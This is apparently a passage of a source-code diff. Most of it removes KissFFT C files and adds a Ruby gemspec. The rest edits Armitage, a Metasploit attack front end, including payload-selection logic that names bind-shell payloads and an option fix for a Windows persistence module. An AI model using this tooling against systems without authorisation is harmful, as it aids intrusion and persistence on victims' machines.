||||
)
|
||||
{
|
||||
size_t k=m;
|
||||
const size_t m2 = 2*m;
|
||||
kiss_fft_cpx *tw1,*tw2;
|
||||
kiss_fft_cpx scratch[5];
|
||||
kiss_fft_cpx epi3;
|
||||
epi3 = st->twiddles[fstride*m];
|
||||
|
||||
tw1=tw2=st->twiddles;
|
||||
|
||||
do{
|
||||
C_FIXDIV(*Fout,3); C_FIXDIV(Fout[m],3); C_FIXDIV(Fout[m2],3);
|
||||
|
||||
C_MUL(scratch[1],Fout[m] , *tw1);
|
||||
C_MUL(scratch[2],Fout[m2] , *tw2);
|
||||
|
||||
C_ADD(scratch[3],scratch[1],scratch[2]);
|
||||
C_SUB(scratch[0],scratch[1],scratch[2]);
|
||||
tw1 += fstride;
|
||||
tw2 += fstride*2;
|
||||
|
||||
Fout[m].r = Fout->r - HALF_OF(scratch[3].r);
|
||||
Fout[m].i = Fout->i - HALF_OF(scratch[3].i);
|
||||
|
||||
C_MULBYSCALAR( scratch[0] , epi3.i );
|
||||
|
||||
C_ADDTO(*Fout,scratch[3]);
|
||||
|
||||
Fout[m2].r = Fout[m].r + scratch[0].i;
|
||||
Fout[m2].i = Fout[m].i - scratch[0].r;
|
||||
|
||||
Fout[m].r -= scratch[0].i;
|
||||
Fout[m].i += scratch[0].r;
|
||||
|
||||
++Fout;
|
||||
}while(--k);
|
||||
}
|
||||
|
||||
static void kf_bfly5(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx *Fout0,*Fout1,*Fout2,*Fout3,*Fout4;
|
||||
int u;
|
||||
kiss_fft_cpx scratch[13];
|
||||
kiss_fft_cpx * twiddles = st->twiddles;
|
||||
kiss_fft_cpx *tw;
|
||||
kiss_fft_cpx ya,yb;
|
||||
ya = twiddles[fstride*m];
|
||||
yb = twiddles[fstride*2*m];
|
||||
|
||||
Fout0=Fout;
|
||||
Fout1=Fout0+m;
|
||||
Fout2=Fout0+2*m;
|
||||
Fout3=Fout0+3*m;
|
||||
Fout4=Fout0+4*m;
|
||||
|
||||
tw=st->twiddles;
|
||||
for ( u=0; u<m; ++u ) {
|
||||
C_FIXDIV( *Fout0,5); C_FIXDIV( *Fout1,5); C_FIXDIV( *Fout2,5); C_FIXDIV( *Fout3,5); C_FIXDIV( *Fout4,5);
|
||||
scratch[0] = *Fout0;
|
||||
|
||||
C_MUL(scratch[1] ,*Fout1, tw[u*fstride]);
|
||||
C_MUL(scratch[2] ,*Fout2, tw[2*u*fstride]);
|
||||
C_MUL(scratch[3] ,*Fout3, tw[3*u*fstride]);
|
||||
C_MUL(scratch[4] ,*Fout4, tw[4*u*fstride]);
|
||||
|
||||
C_ADD( scratch[7],scratch[1],scratch[4]);
|
||||
C_SUB( scratch[10],scratch[1],scratch[4]);
|
||||
C_ADD( scratch[8],scratch[2],scratch[3]);
|
||||
C_SUB( scratch[9],scratch[2],scratch[3]);
|
||||
|
||||
Fout0->r += scratch[7].r + scratch[8].r;
|
||||
Fout0->i += scratch[7].i + scratch[8].i;
|
||||
|
||||
scratch[5].r = scratch[0].r + S_MUL(scratch[7].r,ya.r) + S_MUL(scratch[8].r,yb.r);
|
||||
scratch[5].i = scratch[0].i + S_MUL(scratch[7].i,ya.r) + S_MUL(scratch[8].i,yb.r);
|
||||
|
||||
scratch[6].r = S_MUL(scratch[10].i,ya.i) + S_MUL(scratch[9].i,yb.i);
|
||||
scratch[6].i = -S_MUL(scratch[10].r,ya.i) - S_MUL(scratch[9].r,yb.i);
|
||||
|
||||
C_SUB(*Fout1,scratch[5],scratch[6]);
|
||||
C_ADD(*Fout4,scratch[5],scratch[6]);
|
||||
|
||||
scratch[11].r = scratch[0].r + S_MUL(scratch[7].r,yb.r) + S_MUL(scratch[8].r,ya.r);
|
||||
scratch[11].i = scratch[0].i + S_MUL(scratch[7].i,yb.r) + S_MUL(scratch[8].i,ya.r);
|
||||
scratch[12].r = - S_MUL(scratch[10].i,yb.i) + S_MUL(scratch[9].i,ya.i);
|
||||
scratch[12].i = S_MUL(scratch[10].r,yb.i) - S_MUL(scratch[9].r,ya.i);
|
||||
|
||||
C_ADD(*Fout2,scratch[11],scratch[12]);
|
||||
C_SUB(*Fout3,scratch[11],scratch[12]);
|
||||
|
||||
++Fout0;++Fout1;++Fout2;++Fout3;++Fout4;
|
||||
}
|
||||
}
|
||||
|
||||
/* perform the butterfly for one stage of a mixed radix FFT */
|
||||
static void kf_bfly_generic(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m,
|
||||
int p
|
||||
)
|
||||
{
|
||||
int u,k,q1,q;
|
||||
kiss_fft_cpx * twiddles = st->twiddles;
|
||||
kiss_fft_cpx t;
|
||||
int Norig = st->nfft;
|
||||
|
||||
CHECKBUF(scratchbuf,nscratchbuf,p);
|
||||
|
||||
for ( u=0; u<m; ++u ) {
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
scratchbuf[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratchbuf[q1],p);
|
||||
k += m;
|
||||
}
|
||||
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
int twidx=0;
|
||||
Fout[ k ] = scratchbuf[0];
|
||||
for (q=1;q<p;++q ) {
|
||||
twidx += fstride * k;
|
||||
if (twidx>=Norig) twidx-=Norig;
|
||||
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
|
||||
C_ADDTO( Fout[ k ] ,t);
|
||||
}
|
||||
k += m;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
static
|
||||
void kf_work(
|
||||
kiss_fft_cpx * Fout,
|
||||
const kiss_fft_cpx * f,
|
||||
const size_t fstride,
|
||||
int in_stride,
|
||||
int * factors,
|
||||
const kiss_fft_cfg st
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx * Fout_beg=Fout;
|
||||
const int p=*factors++; /* the radix */
|
||||
const int m=*factors++; /* stage's fft length/p */
|
||||
const kiss_fft_cpx * Fout_end = Fout + p*m;
|
||||
|
||||
#ifdef _OPENMP
|
||||
// use openmp extensions at the
|
||||
// top-level (not recursive)
|
||||
if (fstride==1) {
|
||||
int k;
|
||||
|
||||
// execute the p different work units in different threads
|
||||
# pragma omp parallel for
|
||||
for (k=0;k<p;++k)
|
||||
kf_work( Fout +k*m, f+ fstride*in_stride*k,fstride*p,in_stride,factors,st);
|
||||
// all threads have joined by this point
|
||||
|
||||
switch (p) {
|
||||
case 2: kf_bfly2(Fout,fstride,st,m); break;
|
||||
case 3: kf_bfly3(Fout,fstride,st,m); break;
|
||||
case 4: kf_bfly4(Fout,fstride,st,m); break;
|
||||
case 5: kf_bfly5(Fout,fstride,st,m); break;
|
||||
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
|
||||
}
|
||||
return;
|
||||
}
|
||||
#endif
|
||||
|
||||
if (m==1) {
|
||||
do{
|
||||
*Fout = *f;
|
||||
f += fstride*in_stride;
|
||||
}while(++Fout != Fout_end );
|
||||
}else{
|
||||
do{
|
||||
// recursive call:
|
||||
// DFT of size m*p performed by doing
|
||||
// p instances of smaller DFTs of size m,
|
||||
// each one takes a decimated version of the input
|
||||
kf_work( Fout , f, fstride*p, in_stride, factors,st);
|
||||
f += fstride*in_stride;
|
||||
}while( (Fout += m) != Fout_end );
|
||||
}
|
||||
|
||||
Fout=Fout_beg;
|
||||
|
||||
// recombine the p smaller DFTs
|
||||
switch (p) {
|
||||
case 2: kf_bfly2(Fout,fstride,st,m); break;
|
||||
case 3: kf_bfly3(Fout,fstride,st,m); break;
|
||||
case 4: kf_bfly4(Fout,fstride,st,m); break;
|
||||
case 5: kf_bfly5(Fout,fstride,st,m); break;
|
||||
default: kf_bfly_generic(Fout,fstride,st,m,p); break;
|
||||
}
|
||||
}
|
||||
|
||||
/* facbuf is populated by p1,m1,p2,m2, ...
|
||||
where
|
||||
p[i] * m[i] = m[i-1]
|
||||
m0 = n */
|
||||
static
|
||||
void kf_factor(int n,int * facbuf)
|
||||
{
|
||||
int p=4;
|
||||
double floor_sqrt;
|
||||
floor_sqrt = floor( sqrt((double)n) );
|
||||
|
||||
/*factor out powers of 4, powers of 2, then any remaining primes */
|
||||
do {
|
||||
while (n % p) {
|
||||
switch (p) {
|
||||
case 4: p = 2; break;
|
||||
case 2: p = 3; break;
|
||||
default: p += 2; break;
|
||||
}
|
||||
if (p > floor_sqrt)
|
||||
p = n; /* no more factors, skip to end */
|
||||
}
|
||||
n /= p;
|
||||
*facbuf++ = p;
|
||||
*facbuf++ = n;
|
||||
} while (n > 1);
|
||||
}
|
||||
|
||||
/*
|
||||
*
|
||||
* User-callable function to allocate all necessary storage space for the fft.
|
||||
*
|
||||
* The return value is a contiguous block of memory, allocated with malloc. As such,
|
||||
* It can be freed with free(), rather than a kiss_fft-specific function.
|
||||
* */
|
||||
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem )
|
||||
{
|
||||
kiss_fft_cfg st=NULL;
|
||||
size_t memneeded = sizeof(struct kiss_fft_state)
|
||||
+ sizeof(kiss_fft_cpx)*(nfft-1); /* twiddle factors*/
|
||||
|
||||
if ( lenmem==NULL ) {
|
||||
st = ( kiss_fft_cfg)KISS_FFT_MALLOC( memneeded );
|
||||
}else{
|
||||
if (mem != NULL && *lenmem >= memneeded)
|
||||
st = (kiss_fft_cfg)mem;
|
||||
*lenmem = memneeded;
|
||||
}
|
||||
if (st) {
|
||||
int i;
|
||||
st->nfft=nfft;
|
||||
st->inverse = inverse_fft;
|
||||
|
||||
for (i=0;i<nfft;++i) {
|
||||
const double pi=3.141592653589793238462643383279502884197169399375105820974944;
|
||||
double phase = -2*pi*i / nfft;
|
||||
if (st->inverse)
|
||||
phase *= -1;
|
||||
kf_cexp(st->twiddles+i, phase );
|
||||
}
|
||||
|
||||
kf_factor(nfft,st->factors);
|
||||
}
|
||||
return st;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
|
||||
{
|
||||
if (fin == fout) {
|
||||
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
|
||||
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
|
||||
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
|
||||
}else{
|
||||
kf_work( fout, fin, 1,in_stride, st->factors,st );
|
||||
}
|
||||
}
|
||||
|
||||
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
|
||||
{
|
||||
kiss_fft_stride(cfg,fin,fout,1);
|
||||
}
|
||||
|
||||
|
||||
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
|
||||
buffers from CHECKBUF
|
||||
*/
|
||||
void kiss_fft_cleanup(void)
|
||||
{
|
||||
free(scratchbuf);
|
||||
scratchbuf = NULL;
|
||||
nscratchbuf=0;
|
||||
free(tmpbuf);
|
||||
tmpbuf=NULL;
|
||||
ntmpbuf=0;
|
||||
}
|
||||
|
||||
int kiss_fft_next_fast_size(int n)
|
||||
{
|
||||
while(1) {
|
||||
int m=n;
|
||||
while ( (m%2) == 0 ) m/=2;
|
||||
while ( (m%3) == 0 ) m/=3;
|
||||
while ( (m%5) == 0 ) m/=5;
|
||||
if (m<=1)
|
||||
break; /* n is completely factorable by twos, threes, and fives */
|
||||
n++;
|
||||
}
|
||||
return n;
|
||||
}
|
|
@ -1,123 +0,0 @@
|
|||
#ifndef KISS_FFT_H
|
||||
#define KISS_FFT_H
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <math.h>
|
||||
#include <string.h>
|
||||
#include <malloc.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
/*
|
||||
ATTENTION!
|
||||
If you would like a :
|
||||
-- a utility that will handle the caching of fft objects
|
||||
-- real-only (no imaginary time component ) FFT
|
||||
-- a multi-dimensional FFT
|
||||
-- a command-line utility to perform ffts
|
||||
-- a command-line utility to perform fast-convolution filtering
|
||||
|
||||
Then see kfc.h kiss_fftr.h kiss_fftnd.h fftutil.c kiss_fastfir.c
|
||||
in the tools/ directory.
|
||||
*/
|
||||
|
||||
#ifdef USE_SIMD
|
||||
# include <xmmintrin.h>
|
||||
# define kiss_fft_scalar __m128
|
||||
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
|
||||
#else
|
||||
#define KISS_FFT_MALLOC malloc
|
||||
#endif
|
||||
|
||||
|
||||
#ifdef FIXED_POINT
|
||||
#include <sys/types.h>
|
||||
# if (FIXED_POINT == 32)
|
||||
# define kiss_fft_scalar int32_t
|
||||
# else
|
||||
# define kiss_fft_scalar int16_t
|
||||
# endif
|
||||
#else
|
||||
# ifndef kiss_fft_scalar
|
||||
/* default is float */
|
||||
# define kiss_fft_scalar float
|
||||
# endif
|
||||
#endif
|
||||
|
||||
typedef struct {
|
||||
kiss_fft_scalar r;
|
||||
kiss_fft_scalar i;
|
||||
}kiss_fft_cpx;
|
||||
|
||||
typedef struct kiss_fft_state* kiss_fft_cfg;
|
||||
|
||||
/*
|
||||
* kiss_fft_alloc
|
||||
*
|
||||
* Initialize a FFT (or IFFT) algorithm's cfg/state buffer.
|
||||
*
|
||||
* typical usage: kiss_fft_cfg mycfg=kiss_fft_alloc(1024,0,NULL,NULL);
|
||||
*
|
||||
* The return value from fft_alloc is a cfg buffer used internally
|
||||
* by the fft routine or NULL.
|
||||
*
|
||||
* If lenmem is NULL, then kiss_fft_alloc will allocate a cfg buffer using malloc.
|
||||
* The returned value should be free()d when done to avoid memory leaks.
|
||||
*
|
||||
* The state can be placed in a user supplied buffer 'mem':
|
||||
* If lenmem is not NULL and mem is not NULL and *lenmem is large enough,
|
||||
* then the function places the cfg in mem and the size used in *lenmem
|
||||
* and returns mem.
|
||||
*
|
||||
* If lenmem is not NULL and ( mem is NULL or *lenmem is not large enough),
|
||||
* then the function returns NULL and places the minimum cfg
|
||||
* buffer size in *lenmem.
|
||||
* */
|
||||
|
||||
kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem);
|
||||
|
||||
/*
|
||||
* kiss_fft(cfg,in_out_buf)
|
||||
*
|
||||
* Perform an FFT on a complex input buffer.
|
||||
* for a forward FFT,
|
||||
* fin should be f[0] , f[1] , ... ,f[nfft-1]
|
||||
* fout will be F[0] , F[1] , ... ,F[nfft-1]
|
||||
* Note that each element is complex and can be accessed like
|
||||
f[k].r and f[k].i
|
||||
* */
|
||||
void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout);
|
||||
|
||||
/*
|
||||
A more generic version of the above function. It reads its input from every Nth sample.
|
||||
* */
|
||||
void kiss_fft_stride(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int fin_stride);
|
||||
|
||||
/* If kiss_fft_alloc allocated a buffer, it is one contiguous
|
||||
buffer and can be simply free()d when no longer needed*/
|
||||
#define kiss_fft_free free
|
||||
|
||||
/*
|
||||
Cleans up some memory that gets managed internally. Not necessary to call, but it might clean up
|
||||
your compiler output to call this before you exit.
|
||||
*/
|
||||
void kiss_fft_cleanup(void);
|
||||
|
||||
|
||||
/*
|
||||
* Returns the smallest integer k, such that k>=n and k has only "fast" factors (2,3,5)
|
||||
*/
|
||||
int kiss_fft_next_fast_size(int n);
|
||||
|
||||
/* for real ffts, we need an even size */
|
||||
#define kiss_fftr_next_fast_size_real(n) \
|
||||
(kiss_fft_next_fast_size( ((n)+1)>>1)<<1)
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif
|
|
@ -1,159 +0,0 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
#include "kiss_fftr.h"
|
||||
#include "_kiss_fft_guts.h"
|
||||
|
||||
struct kiss_fftr_state{
|
||||
kiss_fft_cfg substate;
|
||||
kiss_fft_cpx * tmpbuf;
|
||||
kiss_fft_cpx * super_twiddles;
|
||||
#ifdef USE_SIMD
|
||||
long pad;
|
||||
#endif
|
||||
};
|
||||
|
||||
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
|
||||
{
|
||||
int i;
|
||||
kiss_fftr_cfg st = NULL;
|
||||
size_t subsize, memneeded;
|
||||
|
||||
if (nfft & 1) {
|
||||
fprintf(stderr,"Real FFT optimization must be even.\n");
|
||||
return NULL;
|
||||
}
|
||||
nfft >>= 1;
|
||||
|
||||
kiss_fft_alloc (nfft, inverse_fft, NULL, &subsize);
|
||||
memneeded = sizeof(struct kiss_fftr_state) + subsize + sizeof(kiss_fft_cpx) * ( nfft * 3 / 2);
|
||||
|
||||
if (lenmem == NULL) {
|
||||
st = (kiss_fftr_cfg) KISS_FFT_MALLOC (memneeded);
|
||||
} else {
|
||||
if (*lenmem >= memneeded)
|
||||
st = (kiss_fftr_cfg) mem;
|
||||
*lenmem = memneeded;
|
||||
}
|
||||
if (!st)
|
||||
return NULL;
|
||||
|
||||
st->substate = (kiss_fft_cfg) (st + 1); /*just beyond kiss_fftr_state struct */
|
||||
st->tmpbuf = (kiss_fft_cpx *) (((char *) st->substate) + subsize);
|
||||
st->super_twiddles = st->tmpbuf + nfft;
|
||||
kiss_fft_alloc(nfft, inverse_fft, st->substate, &subsize);
|
||||
|
||||
for (i = 0; i < nfft/2; ++i) {
|
||||
double phase =
|
||||
-3.14159265358979323846264338327 * ((double) (i+1) / nfft + .5);
|
||||
if (inverse_fft)
|
||||
phase *= -1;
|
||||
kf_cexp (st->super_twiddles+i,phase);
|
||||
}
|
||||
return st;
|
||||
}
|
||||
|
||||
void kiss_fftr(kiss_fftr_cfg st,const kiss_fft_scalar *timedata,kiss_fft_cpx *freqdata)
|
||||
{
|
||||
/* input buffer timedata is stored row-wise */
|
||||
int k,ncfft;
|
||||
kiss_fft_cpx fpnk,fpk,f1k,f2k,tw,tdc;
|
||||
|
||||
if ( st->substate->inverse) {
|
||||
fprintf(stderr,"kiss fft usage error: improper alloc\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ncfft = st->substate->nfft;
|
||||
|
||||
/*perform the parallel fft of two real signals packed in real,imag*/
|
||||
kiss_fft( st->substate , (const kiss_fft_cpx*)timedata, st->tmpbuf );
|
||||
/* The real part of the DC element of the frequency spectrum in st->tmpbuf
|
||||
* contains the sum of the even-numbered elements of the input time sequence
|
||||
* The imag part is the sum of the odd-numbered elements
|
||||
*
|
||||
* The sum of tdc.r and tdc.i is the sum of the input time sequence.
|
||||
* yielding DC of input time sequence
|
||||
* The difference of tdc.r - tdc.i is the sum of the input (dot product) [1,-1,1,-1...
|
||||
* yielding Nyquist bin of input time sequence
|
||||
*/
|
||||
|
||||
tdc.r = st->tmpbuf[0].r;
|
||||
tdc.i = st->tmpbuf[0].i;
|
||||
C_FIXDIV(tdc,2);
|
||||
CHECK_OVERFLOW_OP(tdc.r ,+, tdc.i);
|
||||
CHECK_OVERFLOW_OP(tdc.r ,-, tdc.i);
|
||||
freqdata[0].r = tdc.r + tdc.i;
|
||||
freqdata[ncfft].r = tdc.r - tdc.i;
|
||||
#ifdef USE_SIMD
|
||||
freqdata[ncfft].i = freqdata[0].i = _mm_set1_ps(0);
|
||||
#else
|
||||
freqdata[ncfft].i = freqdata[0].i = 0;
|
||||
#endif
|
||||
|
||||
for ( k=1;k <= ncfft/2 ; ++k ) {
|
||||
fpk = st->tmpbuf[k];
|
||||
fpnk.r = st->tmpbuf[ncfft-k].r;
|
||||
fpnk.i = - st->tmpbuf[ncfft-k].i;
|
||||
C_FIXDIV(fpk,2);
|
||||
C_FIXDIV(fpnk,2);
|
||||
|
||||
C_ADD( f1k, fpk , fpnk );
|
||||
C_SUB( f2k, fpk , fpnk );
|
||||
C_MUL( tw , f2k , st->super_twiddles[k-1]);
|
||||
|
||||
freqdata[k].r = HALF_OF(f1k.r + tw.r);
|
||||
freqdata[k].i = HALF_OF(f1k.i + tw.i);
|
||||
freqdata[ncfft-k].r = HALF_OF(f1k.r - tw.r);
|
||||
freqdata[ncfft-k].i = HALF_OF(tw.i - f1k.i);
|
||||
}
|
||||
}
|
||||
|
||||
void kiss_fftri(kiss_fftr_cfg st,const kiss_fft_cpx *freqdata,kiss_fft_scalar *timedata)
|
||||
{
|
||||
/* input buffer timedata is stored row-wise */
|
||||
int k, ncfft;
|
||||
|
||||
if (st->substate->inverse == 0) {
|
||||
fprintf (stderr, "kiss fft usage error: improper alloc\n");
|
||||
exit (1);
|
||||
}
|
||||
|
||||
ncfft = st->substate->nfft;
|
||||
|
||||
st->tmpbuf[0].r = freqdata[0].r + freqdata[ncfft].r;
|
||||
st->tmpbuf[0].i = freqdata[0].r - freqdata[ncfft].r;
|
||||
C_FIXDIV(st->tmpbuf[0],2);
|
||||
|
||||
for (k = 1; k <= ncfft / 2; ++k) {
|
||||
kiss_fft_cpx fk, fnkc, fek, fok, tmp;
|
||||
fk = freqdata[k];
|
||||
fnkc.r = freqdata[ncfft - k].r;
|
||||
fnkc.i = -freqdata[ncfft - k].i;
|
||||
C_FIXDIV( fk , 2 );
|
||||
C_FIXDIV( fnkc , 2 );
|
||||
|
||||
C_ADD (fek, fk, fnkc);
|
||||
C_SUB (tmp, fk, fnkc);
|
||||
C_MUL (fok, tmp, st->super_twiddles[k-1]);
|
||||
C_ADD (st->tmpbuf[k], fek, fok);
|
||||
C_SUB (st->tmpbuf[ncfft - k], fek, fok);
|
||||
#ifdef USE_SIMD
|
||||
st->tmpbuf[ncfft - k].i *= _mm_set1_ps(-1.0);
|
||||
#else
|
||||
st->tmpbuf[ncfft - k].i *= -1;
|
||||
#endif
|
||||
}
|
||||
kiss_fft (st->substate, st->tmpbuf, (kiss_fft_cpx *) timedata);
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
# -*- encoding: utf-8 -*-
|
||||
|
||||
Gem::Specification.new do |s|
|
||||
s.name = "kissfft"
|
||||
s.version = "0.0.1"
|
||||
s.authors = ["HD Moore"]
|
||||
s.email = ["hdm@rapid7.com"]
|
||||
s.homepage = ""
|
||||
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
|
||||
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
|
||||
|
||||
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
|
||||
s.test_files = Dir.glob('test/**/*.{rb,data}')
|
||||
s.extensions = [ 'ext/kissfft/extconf.rb' ]
|
||||
s.require_paths = ["lib"]
|
||||
end
|
|
@ -3,7 +3,7 @@
|
|||
<center><h1>Armitage 1.44</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 5 Sept 12</p>
|
||||
<br />Release: 26 Nov 12</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
|
@ -550,6 +550,11 @@ sub data_delete {
|
|||
call("db.key_clear", $1);
|
||||
}
|
||||
|
||||
# data_clear('key') -- clears all data associated with the specified key
|
||||
sub data_clear {
|
||||
data_delete($1);
|
||||
}
|
||||
|
||||
# data_add('key', $object) -- appends value into the database...
|
||||
sub data_add {
|
||||
local('$buffer $data');
|
||||
|
@ -860,7 +865,7 @@ sub file_content {
|
|||
}
|
||||
else {
|
||||
local('%r');
|
||||
%r = call("armitage.download", $1);
|
||||
%r = call("armitage.download_nodelete", $1);
|
||||
return %r['data'];
|
||||
}
|
||||
}
|
||||
|
|
|
@ -349,6 +349,9 @@ sub best_payload {
|
|||
else if ("java/jsp_shell_bind_tcp" in $compatible) {
|
||||
return "java/jsp_shell_bind_tcp";
|
||||
}
|
||||
else if ("cmd/unix/interact" in $compatible) {
|
||||
return "cmd/unix/interact";
|
||||
}
|
||||
else {
|
||||
return "generic/shell_bind_tcp";
|
||||
}
|
||||
|
@ -620,6 +623,34 @@ sub host_attack_items {
|
|||
}
|
||||
}
|
||||
|
||||
sub chooseSession {
|
||||
local('@data $sid $data $host $hdata $temp $tablef');
|
||||
|
||||
# obtain a list of sessions
|
||||
foreach $host (keys(%hosts)) {
|
||||
foreach $sid => $data (getSessions($host)) {
|
||||
$temp = copy($data);
|
||||
$temp['sid'] = $sid;
|
||||
push(@data, $temp);
|
||||
}
|
||||
}
|
||||
|
||||
# sort the session data
|
||||
@data = sort({ return $1['sid'] <=> $2['sid']; }, @data);
|
||||
|
||||
# update the table widths
|
||||
$tablef = {
|
||||
[[$1 getColumn: "sid"] setPreferredWidth: 100];
|
||||
[[$1 getColumn: "session_host"] setPreferredWidth: 300];
|
||||
[[$1 getColumn: "info"] setPreferredWidth: 1024];
|
||||
};
|
||||
|
||||
# let the user choose a session
|
||||
quickListDialog("Choose a session", "Select", @("sid", "sid", "session_host", "info"), @data, $width => 640, $height => 240, lambda({
|
||||
[$call : $1];
|
||||
}, $call => $4), \$tablef);
|
||||
}
|
||||
|
||||
sub addFileListener {
|
||||
local('$table $model $actions');
|
||||
($table, $model, $actions) = @_;
|
||||
|
@ -649,33 +680,7 @@ sub addFileListener {
|
|||
$actions["WORDLIST"] = $actions["*FILE*"];
|
||||
|
||||
# set up an action to choose a session
|
||||
$actions["SESSION"] = {
|
||||
local('@data $sid $data $host $hdata $temp $tablef');
|
||||
|
||||
# obtain a list of sessions
|
||||
foreach $host (keys(%hosts)) {
|
||||
foreach $sid => $data (getSessions($host)) {
|
||||
$temp = copy($data);
|
||||
$temp['sid'] = $sid;
|
||||
push(@data, $temp);
|
||||
}
|
||||
}
|
||||
|
||||
# sort the session data
|
||||
@data = sort({ return $1['sid'] <=> $2['sid']; }, @data);
|
||||
|
||||
# update the table widths
|
||||
$tablef = {
|
||||
[[$1 getColumn: "sid"] setPreferredWidth: 100];
|
||||
[[$1 getColumn: "session_host"] setPreferredWidth: 300];
|
||||
[[$1 getColumn: "info"] setPreferredWidth: 1024];
|
||||
};
|
||||
|
||||
# let the user choose a session
|
||||
quickListDialog("Choose a session", "Select", @("sid", "sid", "session_host", "info"), @data, $width => 640, $height => 240, lambda({
|
||||
[$call : $1];
|
||||
}, $call => $4), \$tablef);
|
||||
};
|
||||
$actions["SESSION"] = lambda(&chooseSession);
|
||||
|
||||
# set up an action to pop up a file chooser for different file type values.
|
||||
$actions["RHOST"] = {
|
||||
|
|
|
@ -475,7 +475,12 @@ sub gotoFile {
|
|||
return lambda({
|
||||
local('$exception');
|
||||
try {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this file:", $f);
|
||||
}
|
||||
}
|
||||
catch $exception {
|
||||
showError("Could not open $f $+ \n $+ $exception");
|
||||
|
|
|
@ -356,6 +356,16 @@ sub _launch_dialog {
|
|||
if (!isShift($1)) {
|
||||
[$dialog setVisible: 0];
|
||||
}
|
||||
|
||||
# fix some module options...
|
||||
if ($command eq "windows/manage/persistence") {
|
||||
if ('REXE' in $options) {
|
||||
$options['ACTION'] = 'REXE';
|
||||
}
|
||||
else {
|
||||
$options['ACTION'] = 'TEMPLATE';
|
||||
}
|
||||
}
|
||||
|
||||
# it's go time buddy... time to filter some stuff...
|
||||
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);
|
||||
|
|
|
@ -188,7 +188,12 @@ sub main_attack_items {
|
|||
|
||||
sub gotoURL {
|
||||
return lambda({
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this URL:", $url);
|
||||
}
|
||||
}, $url => [[new URL: $1] toURI]);
|
||||
}
|
||||
|
||||
|
@ -234,6 +239,23 @@ sub init_menus {
|
|||
dynmenu($top, "Help", 'H', &help_items);
|
||||
|
||||
# setup some global keyboard shortcuts...
|
||||
